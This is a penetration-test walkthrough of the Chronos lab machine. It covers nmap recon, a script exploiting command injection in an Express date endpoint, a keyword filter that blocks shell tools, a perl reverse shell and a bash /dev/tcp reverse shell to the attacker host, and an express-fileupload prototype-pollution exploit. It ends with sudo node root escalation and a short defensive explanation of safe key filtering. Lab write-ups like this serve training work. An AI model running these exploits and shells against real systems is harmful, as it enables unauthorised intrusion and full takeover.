For this penetration test I will use CS (Cobalt Strike) to assist.

## Foothold

Host discovery:
```text
┌──(kali㉿kali)-[~]
└─$ nmap -sP 192.168.56.1/24
Starting Nmap 7.92 ( https://nmap.org ) at 2022-03-31 09:35 EDT
mass_dns: warning: Unable to determine any DNS servers. Reverse DNS is disabled. Try using --system-dns or specify valid servers with --dns-servers
Nmap scan report for 192.168.56.101
Host is up (0.00039s latency).
Nmap scan report for 192.168.56.102
Host is up (0.013s latency).
Nmap done: 256 IP addresses (2 hosts up) scanned in 6.86 seconds
```
Target host IP: 192.168.56.102

Scan the target:
```text
┌──(kali㉿kali)-[~]
└─$ nmap -A 192.168.56.102
Starting Nmap 7.92 ( https://nmap.org ) at 2022-03-31 09:42 EDT
mass_dns: warning: Unable to determine any DNS servers. Reverse DNS is disabled. Try using --system-dns or specify valid servers with --dns-servers
Nmap scan report for 192.168.56.102
Host is up (0.0031s latency).
Not shown: 997 closed tcp ports (conn-refused)
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 e4:f2:83:a4:38:89:8d:86:a5:e1:31:76:eb:9d:5f:ea (RSA)
|   256 41:5a:21:c4:58:f2:2b:e4:8a:2f:31:73:ce:fd:37:ad (ECDSA)
|_  256 9b:34:28:c2:b9:33:4b:37:d5:01:30:6f:87:c4:6b:23 (ED25519)
80/tcp   open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.4.29 (Ubuntu)
8000/tcp open  http    Node.js Express framework
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
|_http-open-proxy: Proxy might be redirecting requests
|_http-cors: HEAD GET POST PUT DELETE PATCH
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 15.90 seconds
```
Visit the target:

A domain name is found: chronos.local

Add it to the hosts file so it resolves; the target can then be accessed.

The page takes an input string and decodes it. The string is **base58**-encoded; analyzing it yields:

4ugYDuAkScCG5gMcZjEN3mALyG1dD5ZYsiCfWvQ2w9anYGyL

Guessing that command execution may be possible, write a script:
```python
import base58
import requests


def attack(command):
    # the format parameter is sent base58-encoded, as the front end does
    url = b'http://chronos.local:8000/date?format=%s' % base58.b58encode(command)
    print(url)
    payload = {}
    headers = {
        'User-Agent': 'Chronos',
        'Accept': '*/*',
        'Accept-Language': 'en-US,en;q=0.5',
        'Origin': 'http://chronos.local',
        'Connection': 'keep-alive',
        'Referer': 'http://chronos.local/',
        'If-None-Match': 'W/"2c-Nrqrq9OAfQyOcS4aQZ8VPoBAXks"'
    }
    response = requests.request("GET", url, headers=headers, data=payload)
    return response.text


if __name__ == '__main__':
    print(attack('&& ls'))
```
Look at the source code:
```javascript
// created by alienum for Penetration Testing
const express = require('express');
const { exec } = require("child_process");
const bs58 = require('bs58');
const app = express();
const port = 8000;
const cors = require('cors');
app.use(cors());

app.get('/', (req, res) => {
    res.sendFile("/var/www/html/index.html");
});

app.get('/date', (req, res) => {
    var agent = req.headers['user-agent'];
    var cmd = 'date ';
    const format = req.query.format;
    const bytes = bs58.decode(format);
    var decoded = bytes.toString();
    var concat = cmd.concat(decoded);
    if (agent === 'Chronos') {
        if (concat.includes('id') || concat.includes('whoami') || concat.includes('python') || concat.includes('nc') || concat.includes('bash') || concat.includes('php') || concat.includes('which') || concat.includes('socat')) {
            res.send("Something went wrong");
        }
        exec(concat, (error, stdout, stderr) => {
            if (error) {
                console.log(`error: ${error.message}`);
                return;
            }
            if (stderr) {
                console.log(`stderr: ${stderr}`);
                return;
            }
            res.send(stdout);
        });
    }
    else {
        res.send("Permission Denied");
    }
})

app.listen(port, () => {
    console.log(`Server running at ${port}`);
})
```
Some strings are filtered, so a plain bash reverse shell will not work. Check which programs are installed on the target:

There is perl, which can be used for the reverse shell:

```python
attack('&&perl -e \'use Socket;$i="192.168.56.101";$p=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};\'')
```

Start a listener on Kali and the shell comes back, but the permissions are not enough to read user.txt.
## Switching users

Check the network connections:

Port 8080 is open on localhost. Accessing it reveals a local service that is a second version of the application, located in **/opt/chronos-v2/backend**. Look at package.json:
```json
{
  "name": "some-website",
  "version": "1.0.0",
  "description": "",
  "main": "server.js",
  "scripts": {
    "start": "node server.js"
  },
  "author": "",
  "license": "ISC",
  "dependencies": {
    "ejs": "^3.1.5",
    "express": "^4.17.1",
    "express-fileupload": "^1.1.7-alpha.3"
  }
}
```
server.js:

```javascript
const express = require('express');
const fileupload = require("express-fileupload");
const http = require('http')
const app = express();
app.use(fileupload({ parseNested: true }));
app.set('view engine', 'ejs');
app.set('views', "/opt/chronos-v2/frontend/pages");

app.get('/', (req, res) => {
    res.render('index')
});

const server = http.Server(app);
const addr = "127.0.0.1"
const port = 8080;
server.listen(port, addr, () => {
    console.log('Server listening on ' + addr + ' port ' + port);
});
```
This version of express-fileupload has a prototype pollution vulnerability, so an existing exploit can be used directly:

exp.py

```python
import requests

### commands to run on victim machine
cmd = 'bash -c "bash -i &> /dev/tcp/192.168.56.101/8020 0>&1"'

print("Starting Attack...")

### pollute
requests.post('http://127.0.0.1:8080', files={'__proto__.outputFunctionName': (
    None, f"x;console.log(1);process.mainModule.require('child_process').exec('{cmd}');x")})

### execute command
requests.get('http://127.0.0.1:8080')

print("Finished!")
```
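The mechanism behind the exploit: with `parseNested: true`, express-fileupload expands dotted multipart field names into nested objects, and a field named `__proto__.outputFunctionName` makes a naive expander write onto `Object.prototype`, where EJS later picks the value up as a render option and splices it into compiled template code. The following is an added example (not express-fileupload's or EJS's code) using simplified stand-in setters, `setPathUnsafe` and `setPathSafe`, to show the pollution with a harmless constructed marker key and the two checks that prevent it: rejecting prototype-walking segments and only descending into own properties.

```javascript
// Added example (not express-fileupload's code): how a nested-field setter
// like the one enabled by parseNested:true can be abused, and a safe variant.
// Assumes multipart field names arrive as dotted paths such as "a.b.c".

// Naive setter: walks the dotted path, creating objects as it goes. For the
// path "__proto__.x" the first step lands on Object.prototype itself.
function setPathUnsafe(target, path, value) {
  const parts = path.split('.');
  let cur = target;
  for (let i = 0; i < parts.length - 1; i++) {
    if (typeof cur[parts[i]] !== 'object' || cur[parts[i]] === null) cur[parts[i]] = {};
    cur = cur[parts[i]];
  }
  cur[parts[parts.length - 1]] = value;
  return target;
}

// Safe setter: reject prototype-walking segments outright and only descend
// into own properties, so attacker-chosen keys never reach Object.prototype.
const FORBIDDEN = new Set(['__proto__', 'constructor', 'prototype']);
function setPathSafe(target, path, value) {
  const parts = path.split('.');
  if (parts.some((p) => FORBIDDEN.has(p))) return null;
  let cur = target;
  for (let i = 0; i < parts.length - 1; i++) {
    if (!Object.prototype.hasOwnProperty.call(cur, parts[i]) ||
        typeof cur[parts[i]] !== 'object' || cur[parts[i]] === null) {
      cur[parts[i]] = {};
    }
    cur = cur[parts[i]];
  }
  cur[parts[parts.length - 1]] = value;
  return target;
}

// Demonstration: does a field name pollute an unrelated, freshly created
// object? Uses a harmless constructed marker key and cleans up afterwards.
function pollutes(setter) {
  const key = 'pollutionMarker';          // constructed marker, not the EJS option
  try {
    setter({}, `__proto__.${key}`, 'polluted');
    return ({})[key] === 'polluted';
  } finally {
    delete Object.prototype[key];
  }
}
```

The same reasoning applies to the deployed service: `parseNested` is off by default, and a patched express-fileupload applies this kind of key filtering, so upgrading the dependency or leaving the option disabled closes the path the exploit above relies on.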
Listen on port 8020 and we get a shell:

user.txt

byBjaHJvbm9zIHBlcm5hZWkgZmlsZSBtb3UK

## Privilege escalation

We can see that node can be run as root without a password, so we can use node to run a script and escalate:

```shell
sudo node -e 'child_process.spawn("/bin/sh", {stdio: [0, 1, 2]})'
```

root.txt:

YXBvcHNlIHNpb3BpIG1hemV1b3VtZSBvbmVpcmEK